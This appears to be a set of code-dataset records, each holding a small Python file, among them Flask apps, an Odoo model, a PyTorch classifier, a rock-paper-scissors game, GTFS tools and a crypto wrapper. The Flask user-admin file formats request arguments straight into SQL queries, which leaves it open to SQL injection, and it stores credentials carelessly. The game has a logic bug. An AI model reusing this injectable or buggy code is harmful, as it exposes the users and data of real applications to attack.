@app.route('/latest/meta-data/iam/security-credentials/BaseIAMRole', methods = ['GET'])\n def base_iam_role():\n if self.credentials is None or self.basic_auth is None:\n return make_response(jsonify({\"error\": \"DO SWITCH\"}), 500)\n return jsonify(self.keys)\n\n @app.errorhandler(400)\n def not_found(error):\n return make_response(jsonify({'error': 'bad request'}), 400)\n\n @app.errorhandler(404)\n def not_found(error):\n return make_response(jsonify({'error': 'not found'}), 404)\n\n @app.errorhandler(500)\n 
def not_found(error):\n return make_response(jsonify({'error': 'internal server error'}), 500)\n\n","sub_path":"credo/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486384235","text":"import sys\nfrom flask import Flask, request, render_template\nimport psycopg2\nimport dj_database_url\nfrom helpers import mysearch, redditsearch\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n@app.route(\"/\")\ndef hello():\n return render_template('index.html')\n\n@app.route(\"/feedback\")\ndef feedback():\n direction = int(request.args['dir'])\n who = int(request.args['who'])\n id = int(request.args['id'])\n\n conn = connect_db()\n cur = conn.cursor()\n\n if direction == 1 and who == 0:\n cur.execute(\"update search set reddit_relevant = reddit_relevant + 1 where id = %s\", [id])\n elif direction == 0 and who == 0:\n cur.execute(\"update search set reddit_irrelevant = reddit_irrelevant + 1 where id = %s\", [id])\n elif direction == 1 and who == 1:\n cur.execute(\"update search set mine_relevant = mine_relevant + 1 where id = %s\", [id])\n elif direction == 0 and who == 1:\n cur.execute(\"update search set mine_irrelevant = mine_irrelevant + 1 where id = %s\", [id])\n\n conn.commit()\n\n return 'OK'\n\n@app.route(\"/s\")\ndef search():\n query = request.args['q']\n \n conn = connect_db()\n cur = conn.cursor()\n\n myresult = mysearch(query, cur)\n redditresult = redditsearch(query, cur)\n\n cur.execute(\"insert into search (query, num_results_reddit, num_results_mine) values (%s, %s, %s) returning id;\", [query, len(redditresult), len(myresult)])\n searchid = cur.fetchone()[0]\n conn.commit()\n\n return render_template('result.html', result1=redditresult, result2=myresult, searchid=searchid) \n\n\ndef connect_db():\n db = dj_database_url.config()\n return psycopg2.connect(database=db.get('NAME', 'redditsearch2'), user=db.get('USER', 'andrew'), password=db.get('PASSWORD', 'password'), host=db.get('HOST', 'localhost'))\n\nif __name__ == \"__main__\":\n app.run(debug=True,port=int(sys.argv[1]), host='0.0.0.0')\n","sub_path":"redditsearch.py","file_name":"redditsearch.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"498338726","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api\n\n\nclass HrHolidays(models.Model):\n _inherit = 'hr.holidays'\n _description = \"Holidays\"\n\n expected_rejoining_date = fields.Datetime(string=\"Expected rejoining date\", readonly=True,\n states={'draft': [('readonly', False)], 'confirm': [('readonly', False)]}, track_visibility='onchange')\n actual_rejoining_date = fields.Datetime(string=\"Actual rejoining date\", track_visibility='onchange')\n\n edit_by_hr = fields.Boolean(compute='_compute_can_edit_name')\n\n def _compute_can_edit_name(self):\n for rec in self:\n edit_only_by_hr = False\n group_hr_holidays_manager = self.env.user.has_group('hr_holidays.group_hr_holidays_manager')\n group_hr_holidays_user = self.env.user.has_group('hr_holidays.group_hr_holidays_user')\n if not group_hr_holidays_manager or not group_hr_holidays_user:\n edit_only_by_hr = False\n if group_hr_holidays_manager or group_hr_holidays_user:\n if rec.state in ('draft', 'confirm'):\n edit_only_by_hr = True\n rec.edit_by_hr = edit_only_by_hr\n\n allocation_date = fields.Date(default=fields.Date.today, help=\"Leave allocated date\", 
track_visibility='onchange')\n allocation_range = fields.Selection([('year', 'Yearly'), ('month', 'Monthly')],\n 'Leave frequency',\n help=\"Periodicity on which you want automatic allocation of leaves to \"\n \"eligible employees.\", track_visibility='onchange')\n\n @api.onchange('date_to')\n def _onchange_date_to(self):\n \"\"\" Update Expected rejoining date. \"\"\"\n res = super(HrHolidays, self)._onchange_date_to()\n self.expected_rejoining_date = self.date_to\n\n holidays_ext_id = fields.Many2one('hr.holidays', string='Extended from leave')\n extended_ids = fields.One2many('hr.holidays', 'holidays_ext_id', string='Extended Leaves')\n\n is_carry_forward_leave = fields.Boolean('Carry forward', track_visibility='onchange')\n date_carry_forward = fields.Date('Leave Expiry Date', track_visibility='onchange')\n\n @api.onchange('holiday_status_id')\n def _onchange_holiday_status_id(self):\n self.is_carry_forward_leave = self.holiday_status_id.is_carry_forward_leave\n","sub_path":"Medical_09122019/hr_leaves_solution/models/leave.py","file_name":"leave.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389977948","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils, models\nfrom sklearn.model_selection import train_test_split\nimport skimage\nimport skimage.io\nfrom pandas import Series\nimport os\nimport skimage.transform\nfrom PIL import Image\nfrom time import time\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\n\ndata_dir = '../input'\nimg_dir = os.path.join(data_dir, 'bee_imgs')\ndata_csv = os.path.join(data_dir, 'bee_data.csv')\ndata = pd.read_csv(data_csv)\n\n\n#set subspecies\ntarget = data['subspecies']\ntarget = Series.as_matrix(target)\ntarget_list = set(target)\ntarget_list = list(target_list)\n\ndic = {}\nfor i in range(7):\n dic[target_list[i]] = i\ndata = data.replace({\"subspecies\": dic})\n\n#define dataset\n\nclass honeybee(Dataset):\n def __init__(self, data, transform = None):\n self.data = data\n self.img_dir = '../input/bee_imgs'\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n def __getitem__(self, index):\n img = os.path.join(self.img_dir, self.data.iloc[index,0])\n image = Image.open(img)\n image = image.resize((120,120))\n image = image.convert('RGB')\n image = self.transform(image)\n label = np.asarray(self.data.iloc[index, 5]) # type: object\n\n return image,label\n\n def __len__(self):\n return len(self.data)\n\n\n# split train test\ntrain, test = train_test_split(data, test_size=0.3)\ntrain_data = honeybee(train)\ntest_data = honeybee(test)\n\n\nepochs = 30\nbatch_size = 64\nlearning_rate = 0.001\n\n#Data Loader\ntrain_loader = torch.utils.data.DataLoader(dataset=train_data, batch_size=batch_size,shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_data, batch_size=batch_size, shuffle=False)\n\n# CNN Model\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 32, kernel_size=3, stride= 1, padding=2), # RGB image channel = 3, output channel = num_filter\n nn.ReLU(),\n nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=2),\n 
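# note (added): kernel_size=3 with padding=2 grows H and W by 2 per conv (120 -> 122 -> 124); the 2x2 max-pool below then halves them to 62\n            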
nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Dropout(p=0.5)) #output size (16,61,61)\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=3, stride= 1, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2), #output size (32,32,32)\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=2),\n nn.ReLU(),\n nn.Dropout(p=0.5)\n ) #output size (64,34,34)\n\n self.layer3 = nn.Sequential(\n nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2),\n nn.Dropout(p=0.5))\n #output size(128,18,18)\n\n self.layer4 = nn.Sequential(\n nn.Linear(128*18*18, 256),\n nn.Linear(256, 128),\n nn.Linear(128, 7)\n )\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = out.view(out.size(0), -1)\n out = self.layer4(out)\n return out\n\ncnn = CNN()\n\ncnn.cuda()\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(cnn.parameters(), lr=learning_rate)\n# -----------------------------------------------------------------------------------\nstart = time()\n# Train the Model\nlosses = []\nfor epoch in range(epochs):\n for i, (images, labels) in enumerate(train_loader):\n images = Variable(images).cuda()\n labels = Variable(labels).cuda()\n\n # Forward + Backward + Optimize\n optimizer.zero_grad()\n outputs = cnn(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n losses.append(loss.item())\n if (i + 1) % 10 == 0:\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'\n % (epoch + 1, epochs, i + 1, len(train_data) // batch_size, loss.data[0]))\n\n\n# -----------------------------------------------------------------------------------\n# Test the Model\ncnn.eval() # Change model to 'eval' mode (BN uses moving mean/var).\ncorrect = 0\ntotal = 0\npred_prob = []\npred = []\ny = []\nfor images, labels in test_loader:\n images = Variable(images).cuda()\n outputs = cnn(images)\n _, predicted = torch.max(outputs.data, 1)\n #get probabilty\n prob = nn.functional.softmax(outputs, dim=1)\n pred_prob.append(prob.detach().cpu().numpy())\n pred.append(predicted.cpu().numpy())\n y.append(labels.cpu().numpy())\n\n total += labels.size(0)\n correct += (predicted.cpu() == labels).sum()\nend = time()\nprint('Computational Time:', end - start)\n# -----------------------------------------------------------------------------------\nprint('Test Accuracy of the model on the 1000 test images: %d %%' % (100 * correct / total))\n\n\n#----------\n#plot train loss\nplt.title(\"CrossEntropyLoss\")\nplt.xlabel('Iteration')\nplt.ylabel('Loss')\nplt.plot(losses)\nplt.ylim(0,3.2)\nplt.show()\n\n#classification report\ny_true = np.concatenate(y,axis=0)\npred = np.concatenate(pred).ravel()\nclassification_report = classification_report(y_true, pred, target_names=target_list)\nprint(\"Classfication report:\")\nprint(classification_report)\n\n#calculate ROC\npred_prob = np.concatenate(pred_prob, axis=0)\ny = np.concatenate(y,axis=0)\ny_dummy = pd.get_dummies(y).values\n\nfpr = dict()\ntpr = dict()\nroc_auc = dict()\n\nfor i in range(len(target_list)):\n fpr[i], tpr[i], _ = metrics.roc_curve(y_dummy[:,i], pred_prob[:,i])\n roc_auc[i] = metrics.auc(fpr[i],tpr[i])\n\ncolors = (['blue', 'red', 'green',\"yellow\",\"pink\",\"blue\",\"orange\"])\nfor i, color in zip(range(7), colors):\n plt.plot(fpr[i], tpr[i], color=color,\n label='ROC curve of class {0} (area = {1:0.2f})'\n ''.format(i, roc_auc[i]))\nplt.plot([0, 1], [0, 1], 'k--',)\nplt.xlim([0, 1])\nplt.ylim([0,1])\nplt.xlabel('False Positive 
Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver operating characteristic for all labels')\nplt.legend(loc=\"lower right\")\n\nplt.show()\n\n","sub_path":"Code/Subspecies_Torch.py","file_name":"Subspecies_Torch.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"113347916","text":"# -*- encoding: utf-8 -*-\n__author__ = 'yannan'\nfrom flask import Flask,request,render_template,redirect,url_for\nimport conn_db\napp = Flask(__name__)\n@app.route('/')\ndef index():\n sql_comm = 'select * from userinfo'\n return render_template(\"index.html\",data=conn_db.mysql_select(sql_comm))\n@app.route('/add')\ndef add():\n user = request.args.get('user')\n pwd = request.args.get('pwd')\n sql_comm = 'select username from userinfo where username =\"%s\"' %(user)\n user_exist = conn_db.mysql_select(sql_comm)\n if not user or not pwd:\n return '
need user and pwd'+redirect(url_for('index'))\n    elif user_exist:\n        return 'user exist
'+redirect(url_for('index'))\n else:\n sql_comm = 'insert into userinfo(username,password) values(\"%s\",\"%s\")' %(user,pwd)\n conn_db.mysql_select(sql_comm)\n return redirect(url_for('index'))\n@app.route('/delete')\ndef delete():\n user = request.args.get('user')\n sql_comm='delete from userinfo where username=\"%s\"' %(user)\n conn_db.mysql_select(sql_comm)\n return redirect(url_for('index'))\nif __name__=='__main__':\n app.run(debug=True,host=\"0.0.0.0\",port=9527)","sub_path":"07/yannan/rebuildw06-v2.py","file_name":"rebuildw06-v2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45315271","text":"from django.db import models\nfrom apps.usergroups.models import Agent\nfrom apps.oauthaccounts.models import OAuthAccount\n\n# Create your models here.\nclass EmailAccount(models.Model):\n agent = models.ForeignKey(Agent,on_delete=models.CASCADE)\n email = models.EmailField(max_length=255, unique=True)\n GOOGLE = \"GOO\"\n OUTLOOK = \"OUT\"\n YAHOO = \"YAH\"\n OTHERS = \"OTH\"\n EMAIL_SERVICE_PROVIDERS = (\n (GOOGLE, 'Google'),\n (OUTLOOK, 'Outlook'),\n (YAHOO, 'Yahoo'),\n (OTHERS, 'Others'),\n )\n email_service_provider = models.CharField(max_length=3, choices=EMAIL_SERVICE_PROVIDERS)\n oauth = models.OneToOneField(OAuthAccount, on_delete=models.CASCADE, null=True, blank=True)\n #smtp_settings - future use\n\n def __str__(self):\n return self.agent.business_alias + \" - \" + self.email","sub_path":"propelproject/apps/emailaccounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573562675","text":"# Shawn Wright\r\n# 4/9/18\r\n# The file we used in class ( pet)\r\n\r\nimport pet\r\n\r\ndef main():\r\n # local varibles\r\n\r\n pet_name = \"\"\r\n pet_type = \"\"\r\n pet_age = \"\"\r\n\r\n # get pet data\r\n pet_name = input(\"Enter the name of the pet: \")\r\n pet_type = input(\"Enter the type of the pet: \")\r\n pet_age = int(input(\"Enter the age of the pet: \"))\r\n\r\n # Create an insance of the pet class and assign it to an object\r\n mypet = pet.Pet(pet_name, pet_type, pet_age)\r\n\r\n\r\n # display the datat that was entered\r\n print(\"here is the data that you entered\")\r\n print(\"pet name: \", mypet.get_name())\r\n print(\"pet type: \", mypet.get_animal_type())\r\n print(\"pet type: \", mypet.get_age())\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmain()\r\n","sub_path":"Classes/EXAMPLES/wright_cw49.py","file_name":"wright_cw49.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48943861","text":"import random\n\nsymbols = ['rock', 'paper', 'scissors']\n\nplayer_wins = 0\ncomputer_wins = 0\n\nwhile max([player_wins, computer_wins]) < 3:\n player_symbol = None\n while player_symbol is None:\n input_symbol = input(\"what symbol do you want? 
\")\n if input_symbol in symbols:\n player_symbol = input_symbol\n else:\n print('please pick rock, paper, or scissors')\n\n computer_symbol = random.choice(symbols)\n\n print('Player: ', player_symbol)\n print('Computer: ', computer_symbol)\n\n if player_symbol == computer_symbol:\n print ('TIE!')\n elif player_symbol == 'rock':\n if computer_symbol == 'paper': \n print('COMPUTER_WINS!')\n computer_wins += 1\n else:\n print('Player wins!')\n player_wins += 1\n elif player_symbol == 'paper':\n if computer_symbol == 'scissors':\n print ('COMPUTER WINS!')\n computer_wins += 1\n else:\n print('PLAYER WINS!')\n player_wins +=1\n elif player_symbol == 'rock':\n if computer_symbol == 'scissors':\n print ('COMPUTER WINS!')\n computer_wins += 1\n else:\n print('PLAYER WINS!')\n player_wins +=1\n print('Player Wins:')\n print(player_wins)\n print('computer wins:')\n print(computer_wins)\n \n \n \n","sub_path":"rps_norman2.py","file_name":"rps_norman2.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631885308","text":"import requests\nimport traceback\nimport logging\nimport json\nfrom robot.libraries.BuiltIn import ExecutionFailed\n\n\nlogger = logging.getLogger(__file__)\n\n\nclass ControllerAdapter(object):\n def __init__(self, endpoint):\n self.endpoint = endpoint\n\n def _post(self, url_path, data):\n url = 'http://%s/%s' % (self.endpoint, url_path)\n headers = {'Content-Type': 'application/json'}\n\n logger.info('Sending request to %s' % url)\n resp = None\n try:\n resp = requests.post(url=url, headers=headers, data=json.dumps(data))\n except requests.RequestException:\n logger.debug('Error during request %s' % url)\n logger.debug(traceback.format_exc())\n return\n finally:\n if resp is not None and resp.status_code != 200:\n msg ='Server responded with error code: %s' % str(resp.text)\n logger.debug(msg)\n raise ExecutionFailed(msg)\n\n logger.info('Request success %s' % resp.text)\n\n def clean_data(self):\n self._post(url_path='force_clean', data={})\n\n def create_network(self, name, cidr):\n data = {'name': name, 'cidr': cidr}\n self._post(url_path='create/network', data=data)\n\n def create_logical_port(self, net_id, docker_id, docker_ip):\n data = {'net_id': net_id,\n 'container': {\n 'id': docker_id,\n 'ip': docker_ip\n }}\n self._post(url_path='create/logical_port', data=data)\n\n def remove_logical_port(self, net_id, docker_id, docker_ip):\n data = {'net_id': net_id,\n 'container': {\n 'id': docker_id,\n 'ip': docker_ip\n }}\n self._post(url_path='remove/logical_port', data=data)","sub_path":"robot-tests/libs/ControllerAdapter.py","file_name":"ControllerAdapter.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565387643","text":"from Crypto.PublicKey import RSA as cryRSA\r\nimport AES256\r\nimport RSA\r\nimport ECDSA\r\n\r\nroot_dir = 'D:\\Design\\Pycharm\\\\Network\\jilei_xiao_xue_qi\\Keys'\r\n\r\n\r\ndef load_rsa_file(fn):\r\n key = None\r\n try:\r\n key = cryRSA.importKey(open(fn).read())\r\n except Exception as err:\r\n print('导入rsa的KEY文件出错', fn, err)\r\n return key\r\n\r\n\r\ndef encode(data, mode):\r\n if mode == 'aes256':\r\n cipher = AES256.encode(data)\r\n return cipher\r\n elif mode == 'rsa':\r\n pubkey = load_rsa_file(root_dir + '\\master\\\\rsa_public_key.pem')\r\n cipher = RSA.rsa_enc(data, pubkey)\r\n return cipher\r\n elif mode == 'ecdsa':\r\n signature = 
ECDSA.sign(bytes(data,encoding='utf-8'))\r\n return signature\r\n else:\r\n print('other')\r\n\r\n\r\ndef decode(cipher, mode, message=None, signature=None):\r\n if mode == 'aes256':\r\n plain = AES256.decode(cipher)\r\n return plain\r\n elif mode == 'rsa':\r\n prikey = load_rsa_file(root_dir + '\\ghost\\\\rsa_private_key.pem')\r\n plain = RSA.rsa_dec(cipher, prikey)\r\n return plain\r\n elif mode == 'ecdsa':\r\n ECDSA.verify(message, signature)\r\n else:\r\n print('other')\r\n\r\n\r\nif __name__ == '__main__':\r\n message = '纪磊'\r\n mode1 = 'aes256'\r\n mode2 = 'rsa'\r\n mode = mode2\r\n\r\n cipher = encode(message, mode)\r\n plain = decode(cipher, mode)\r\n print(plain)\r\n","sub_path":"crypto/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178803031","text":"\"\"\"\nThis module defines a ``Feed`` class to represent GTFS feeds.\nThere is an instance attribute for every valid GTFS table (routes, stops, etc.), which stores the table as a Pandas DataFrame, or as ``None`` in case that table is missing.\n\nThe ``Feed`` class also has heaps of methods: a method to compute route stats, a method to compute screen line counts, validations methods, etc.\nTo ease reading, almost all of these methods are defined in other modules and grouped by theme (``routes.py``, ``stops.py``, etc.).\nThese methods, or rather functions that operate on feeds, are then imported within the ``Feed`` class.\nHowever, this separation of methods messes up the ``Feed`` class documentation slightly by introducing an extra leading ``feed`` parameter in the method signatures.\nIgnore that extra parameter; it refers to the ``Feed`` instance, usually called ``self`` and usually hidden automatically by documentation tools.\n\nConventions in the code below:\n - Dates are encoded as date strings of the form YYMMDD\n - Times are encoded as time strings of the form HH:MM:SS with the possibility that the hour is greater than 24\n - 'DataFrame' and 'Series' refer to Pandas DataFrame and Series objects, respectively\n\"\"\"\nfrom pathlib import Path\nimport tempfile\nimport shutil\nfrom collections import OrderedDict\n\nimport pandas as pd\nimport shapely.geometry as sg\n\n\nclass Feed(object):\n \"\"\"\n An instance of this class represents a not-necessarily-valid GTFS feed, where GTFS tables are stored as DataFrames.\n Beware that the stop times DataFrame can be big (several gigabytes), so make sure you have enough memory to handle it.\n\n Public instance attributes:\n\n - ``agency``\n - ``stops``\n - ``routes``\n - ``trips``\n - ``stop_times``\n - ``calendar``\n - ``calendar_dates``\n - ``fare_attributes``\n - ``fare_rules``\n - ``shapes``\n - ``frequencies``\n - ``transfers``\n - ``feed_info``\n \"\"\"\n gtfs_tables = [\n 'agency',\n 'calendar',\n 'calendar_dates',\n 'fare_attributes',\n 'fare_rules',\n 'feed_info',\n 'frequencies',\n 'routes',\n 'shapes',\n 'stops',\n 'stop_times',\n 'trips',\n 'transfers',\n ]\n\n str_fields= [\n 'agency_id'\n 'trip_id',\n 'service_id',\n 'shape_id',\n 'block_id',\n 'route_id',\n 'stop_id',\n 'fare_id',\n 'origin_id',\n 'destination_id',\n 'contains_id',\n 'from_stop_id',\n 'to_stop_id',\n 'parent_station',\n ]\n\n def __init__(self, agency=None, stops=None, routes=None,\n trips=None, stop_times=None, calendar=None, calendar_dates=None,\n fare_attributes=None, fare_rules=None, shapes=None,\n frequencies=None, transfers=None, feed_info=None):\n \"\"\"\n Assume 
that every non-None input is a Pandas DataFrame.\n No formats are checked.\n In particular, a Feed instance need not represent a valid GTFS feed.\n \"\"\"\n # Set primary attributes; the @property magic below will then\n # validate some and automatically set secondary attributes\n for prop, val in locals().items():\n if prop in Feed.gtfs_tables:\n setattr(self, prop, val)\n \n def __str__(self):\n d = OrderedDict()\n for table in Feed.gtfs_tables:\n try:\n d[table] = getattr(self, table).head(5)\n except:\n d[table] = None\n return '\\n'.join(['* {!s} --------------------\\n\\t{!s}'.format(k, v) for k, v in d.items()])\n\n def build_geometry_by_shape(self, shape_ids=None):\n \"\"\"\n Given a GTFS feed object, return a dictionary with structure \n shape ID -> Shapely LineString representation of shape,\n where the dictionary ranges over all shapes in the feed.\n Use WGS84 longitude-latitude coordinates, the native coordinate system of GTFS.\n\n If a list of shape IDs ``shape_ids`` is given, \n then only include the given shape IDs in the dictionary.\n\n NOTES:\n - Raise a ValueError if the feed has no shapes\n \"\"\"\n if self.shapes is None:\n raise ValueError('This feed has no shapes')\n\n d = dict()\n sh = self.shapes.copy()\n\n # Restrict shapes if necessary\n if shape_ids is not None:\n sh = sh[sh['shape_id'].isin(shape_ids)]\n\n sh = sh.sort_values(['shape_id', 'shape_pt_sequence'])\n\n for shid, group in sh.groupby('shape_id'):\n lonlats = group[['shape_pt_lon', 'shape_pt_lat']].values\n d[shid] = sg.LineString(lonlats)\n\n return d\n\n def trip_to_geojson(self, trip_id):\n \"\"\"\n Given a GTFS feed object and a trip ID from that feed,\n return a GeoJSON LineString feature (as a Python dictionary)\n representing the trip's geometry and its metadata\n (trip ID, direction ID, headsign, etc.).\n Use WGS84 coordinates, the native coordinate system of GTFS.\n\n NOTES:\n Raise a ``ValueError`` if the appropriate GTFS data does not exist.\n \"\"\"\n if trip_id not in self.trips['trip_id'].values:\n raise ValueError('Trip ID {!s} not present in feed trips'.format(trip_id))\n\n # Get trip data as dictionary, replacing numpy.nan with 'n/a' to ease later\n # conversion to JSON\n t = self.trips.copy()\n d = t[t['trip_id'] == trip_id].fillna('n/a').to_dict(orient='records')[0]\n\n # Get Shapely LineString for trip shape\n shid = d['shape_id']\n geom = self.build_geometry_by_shape(shape_ids=[shid])[shid]\n\n # Convert LineString to GeoJSON format\n result = {\n 'type': 'Feature', \n 'properties': d,\n 'geometry': sg.mapping(geom),\n }\n return result\n\n def compute_screen_line_counts(self, linestring):\n \"\"\"\n Find all trips in the given GTFS self object that intersect the given Shapely LineString\n (given in WGS84 coordinates), and return a data frame with the columns:\n\n - ``'trip_id'``\n - ``'route_id'``\n - ``'route_short_name'``\n - ``'direction_id'``\n - ``'shape_id'``\n \"\"\"\n # Convert all shapes to linestrings\n geometry_by_shape = self.build_geometry_by_shape()\n\n # Interate through linestrings to find intersections with screenline\n hits = []\n for shid, geom in geometry_by_shape.items():\n if geom.intersects(linestring):\n hits.append(shid)\n\n # Compile trip info for hits\n t = self.trips.copy()\n t = t[t['shape_id'].isin(hits)].copy()\n result = t.merge(self.routes) # Add more route info\n\n return result[['trip_id', 'route_id', 'route_short_name', 'direction_id', 'shape_id']]\n\ndef read_gtfs(path):\n \"\"\"\n Given a path (string or pathlib object) to a (zipped) GTFS 
feed,\n read the feed and return its corresponding Feed instance.\n\n NOTES:\n - Ignore files that are not valid GTFS; see https://developers.google.com/transit/gtfs/reference/.\n - Ensure that all ID fields that could be string ('stop_id', 'route_id', etc.) are parsed as strings and not as numbers. \n \"\"\"\n path = Path(path)\n \n # Unzip feed into temporary directory\n tmp_dir = tempfile.TemporaryDirectory()\n shutil.unpack_archive(str(path), tmp_dir.name, 'zip')\n\n # Read valid GTFS files into Pandas data frames\n feed_dict = {}\n dtype = {field: str for field in Feed.str_fields} # ensure some string types\n for p in Path(tmp_dir.name).iterdir(): \n name = p.stem\n if name in Feed.gtfs_tables:\n feed_dict[name] = pd.read_csv(p, dtype=dtype)\n \n # Delete temporary directory\n tmp_dir.cleanup()\n \n return Feed(**feed_dict)","sub_path":"homework_solutions/new_gtfs_tools.py","file_name":"new_gtfs_tools.py","file_ext":"py","file_size_in_byte":7849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"399142588","text":"\"\"\"Unit tests for Location model.\"\"\"\nfrom django.test import TestCase\nfrom django.contrib.gis.geos import Point\nfrom opianalytics.apps.location.models.location import Location\nfrom django.core.exceptions import ValidationError\nimport pathlib\n\n\nclass LocationModelTestCase(TestCase):\n \"\"\"Provide the tests of the Location model.\"\"\"\n\n def setUp(self):\n self.test_absolue_path = pathlib.Path(__file__).parent.absolute()\n \n def test_int_when_add_valid_coordinates(self):\n # Setup\n latitude = 19.3576284\n longitude = -99.2725381\n\n # Execution\n location_id = Location.objects.add(latitude, longitude)\n\n # Validation\n self.assertEqual(type(location_id), int)\n\n def test_error_when_add_invalid_coordinates(self):\n # Setup\n latitude = '1234'\n longitude = 'abcd'\n\n # Validation\n self.assertRaises(\n ValidationError,\n lambda: Location.objects.add(latitude, longitude)\n )\n\n def test_error_when_add_from_csv_not_found(self):\n # Setup\n csv_fake_filename = '{0}/{1}'.format(\n self.test_absolue_path, 'fake.csv'\n )\n \n # Validation\n self.assertRaises(\n ValidationError,\n lambda: Location.objects.add_from_csv(csv_fake_filename)\n )\n\n def test_3_when_add_from_csv(self):\n # Setup\n csv_filename = '{0}/{1}'.format(\n self.test_absolue_path, 'locations_valid.csv'\n )\n\n # Execution\n total_locations_added = Location.objects.add_from_csv(csv_filename)\n \n # Validation\n self.assertEqual(total_locations_added, 3)\n\n def test_2_when_add_from_csv_repeated(self):\n # Setup\n csv_filename = '{0}/{1}'.format(\n self.test_absolue_path, 'locations_repeated.csv'\n )\n\n # Execution\n total_locations_added = Location.objects.add_from_csv(csv_filename)\n \n # Validation\n self.assertEqual(total_locations_added, 2)\n","sub_path":"backend/opianalytics/apps/location/tests/test_location_model.py","file_name":"test_location_model.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644084220","text":"import json\nimport sys\nimport time\nfrom collections import Counter\n\nimport pandas as pd\nimport yaml\n\n\nclass JsonFileWordCountProgram:\n\n def get_yaml_property(self):\n '''\n yaml 형태의 property 파일을 읽어들임\n :return: object 형태의 데이터\n '''\n \n with open(\"property.yml\") as file:\n data = yaml.load(file, Loader=yaml.FullLoader)\n\n return data\n\n def get_key_data_from_json_file(self, input_file_name, key):\n '''\n json 
파일에서 해당하는 key값에만 해당하는 데이터를 가져옴\n :param inputFileName: input 파일 이름\n :param key: 가져올 key의 이름\n :return: key값에만 해당하는 2차원 list 형태의 데이터\n '''\n\n key_data = []\n with open(input_file_name, encoding='UTF-8') as f:\n for line in f:\n json_data = json.loads(line)\n key_data.append(json_data[key])\n\n return key_data\n\n def split_data_by_blank(self, data):\n '''\n string 형태의 input을 공백으로 나눠서 2차원 list 형태로 return\n :param raw_data: input 데이터\n :return: 공백으로 나눠진 2차원 list 형태의 데이터\n '''\n\n for index in range(len(data)):\n data[index] = data[index].split()\n\n return data\n\n def get_count_by_word(self, splitted_data):\n '''\n 각 단어의 개수를 셈\n :param splitted_data: 공백 단위로 나눠진 list 형태의 데이터\n :return: counted_data = 각 단어의 개수가 세어진 데이터, the_number_of_word = 파일이 가지고 있는 총 단어의 개수 (set)\n '''\n\n counted_data = Counter()\n for i in range(len(splitted_data)):\n counted_data.update(splitted_data[i])\n\n the_number_of_words = len([key for key, value in counted_data.items()])\n\n return counted_data, the_number_of_words\n\n def sort_collections_to_list(self, property_data, counted_data, length):\n '''\n collections 형태의 데이터를 정렬하여 list 형태로 return\n :param property_data: sort option을 선택하기 위한 property data\n :param counted_data: 각 단어가 몇 개 인지 세어진 데이터\n :param length: input 파일이 가지고 있는 총 단어의 개수 (set)\n :return: 내림차순이나 오름차순으로 정렬한 list 형태의 데이터\n '''\n\n sort_option = property_data['sort option']\n \n if sort_option == 'descending':\n sorted_list = counted_data.most_common(n=length) # 내림차순\n elif sort_option == 'ascending':\n sorted_list = list(reversed(counted_data.most_common(n=length))) # 오름차순\n else:\n print(\"Error: property 파일에 적을 수 있는 'sort option' 내림차순과 오름차순입���다. (option: descending, ascending)\")\n sys.exit()\n\n return sorted_list\n\n def 